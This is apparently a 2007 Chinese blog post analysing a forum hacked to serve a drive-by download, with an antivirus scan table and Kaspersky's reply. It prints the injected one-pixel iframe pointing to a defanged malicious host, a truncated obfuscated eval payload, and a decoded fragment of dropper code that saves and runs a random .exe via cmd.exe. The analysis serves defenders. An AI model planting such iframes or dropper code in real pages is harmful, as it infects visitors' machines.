某论坛被挂马 down.exe / Virus.Win32.AutoRun.z / Trojan.PWS.Maran.262

某论坛被挂马 down.exe / Virus.Win32.AutoRun.z  / Trojan.PWS.Maran.262

endurer 原创
2007-07-28 第2版 补充 Kaspersky 的回复
2007-07-28 第1版

打开该论坛中偶常去的版面，瑞星提示有可疑文件下载运行。

用Google搜索，果然Google已经标出来了：
http://www.google.cn/search?complete=1&hl=zh-CN&newwindow=1&q=%E8%BF%98%E7%8F%A0%E5%8C%BA+%E6%97%A7%E9%9B%A8%E6%A5%BC%E6%B8%85%E9%A3%8E%E9%98%81&meta=

检查网页代码，被加入：
/---
＜iframe src=hxxp://i**.x***in**8.info/wm.htm width=1 height=1＞＜/iframe＞
---/

hxxp://i**.x***in**8.info/wm.htm 包含代码：
/---
＜script src=0614.js＞＜/script＞
---/

hxxp://i**.x***in**8.info/0614.js 内容为：
/---
eval（"/146/165/156/143/…(略)…/146/75/61/73/175"）
---/

经过2次解密，得到原始代码，功能是下载 down.exe，保存到%windir%下，文件名由自定义函数：
/---
function QK45u3（rm4mf）｛var m0qNW ＝ window［“Math”］［“random”］（）＊rm4mf;return Math［“round”］（m0qNW）＋‘.exe’；｝
---/
即***.exe，其中*为数字，接着通过cmd.exe /c 来运行。

文件说明符 : D:/test/down.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-7-28 15:2:29
修改时间 : 2007-7-28 15:2:29
访问时间 : 2007-7-28 15:3:29
大小 : 19602 字节 19.146 KB
MD5 : a329a121353d80b9871119788f7b14c7

nSPack 1.3 -＞ North Star/Liu Xing Ping

 

文件 down.exe 接收于 2007.07.28 09:14:12 (CET)
当前状态:  完成
反病毒引擎 版本 最后更新 扫描结果 AhnLab-V3 2007.7.28.0 2007.07.27 Win-Trojan/Hupigon.Gen AntiVir 7.4.0.50 2007.07.27 TR/Agent.19602 Authentium 4.93.8 2007.07.27 Possibly a new variant of W32/Threat-HLLIN-Slipper-based!Maximus Avast 4.7.997.0 2007.07.27 Win32:Small-AMI AVG 7.5.0.476 2007.07.27 Downloader.Generic5.ECA BitDefender 7.2 2007.07.28 GenPack:Generic.Malware.WBdld.92022134 CAT-QuickHeal 9.00 2007.07.26 (Suspicious) - DNAScan ClamAV 0.91 2007.07.28 - DrWeb 4.33 2007.07.27 Trojan.PWS.Maran.262 eSafe 7.0.15.0 2007.07.24 suspicious Trojan/Worm eTrust-Vet 31.1.5010 2007.07.28 - Ewido 4.0 2007.07.27 - FileAdvisor 1 2007.07.28 - Fortinet 2.91.0.0 2007.07.28 - F-Prot 4.3.2.48 2007.07.27 W32/Threat-HLLIN-Slipper-based!Maximus F-Secure 6.70.13030.0 2007.07.27 W32/Hupigon.gen67 Ikarus T3.1.1.8 2007.07.27 Backdoor.Win32.Agent.ahj Kaspersky 4.0.2.24 2007.07.28 - McAfee 5085 2007.07.27 - Microsoft 1.2704 2007.07.28 - NOD32v2 2426 2007.07.27 a variant of Win32/TrojanDownloader.Delf.NSA Norman 5.80.02 2007.07.27 W32/Hupigon.gen67 Panda 9.0.0.4 2007.07.28 Generic Trojan Rising 19.33.42.00 2007.07.27 - Prevx1 V2 2007.07.28 W32.MALWARE.GEN Sophos 4.19.0 2007.07.26 Mal/Packer Sunbelt 2.2.907.0 2007.07.28 VIPRE.Suspicious Symantec 10 2007.07.28 - TheHacker 6.1.7.155 2007.07.28 - VBA32 3.12.2.1 2007.07.27 MalwareScope.Trojan-PSW.Game.14 VirusBuster 4.3.26:9 2007.07.27 - Webwasher-Gateway 6.0.1 2007.07.28 Trojan.Agent.19602

附加信息

File size: 19602 bytes

MD5: a329a121353d80b9871119788f7b14c7

SHA1: cd849c87c62a23adc01b3d9c1b3c1e5b848faa03

Prevx info: http://fileinfo.prevx.com/fileinfo.asp?PX5=CBB0E79992C2FA964C9000F9F5065B00EFB6D5A7

Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.

主　题： RE:  [KLAB-2516758]   发件人： "" <newvirus@kaspersky.com>   发送时间：2007-07-28 16:16:38 Hello.

Virus.Win32.AutoRun.z

New malicious software was found in the attached file.

It's detection will be included in the next update. Thank you for your help.

-----------------

Regards, Yury Nesmachny

Virus Analyst, Kaspersky Lab.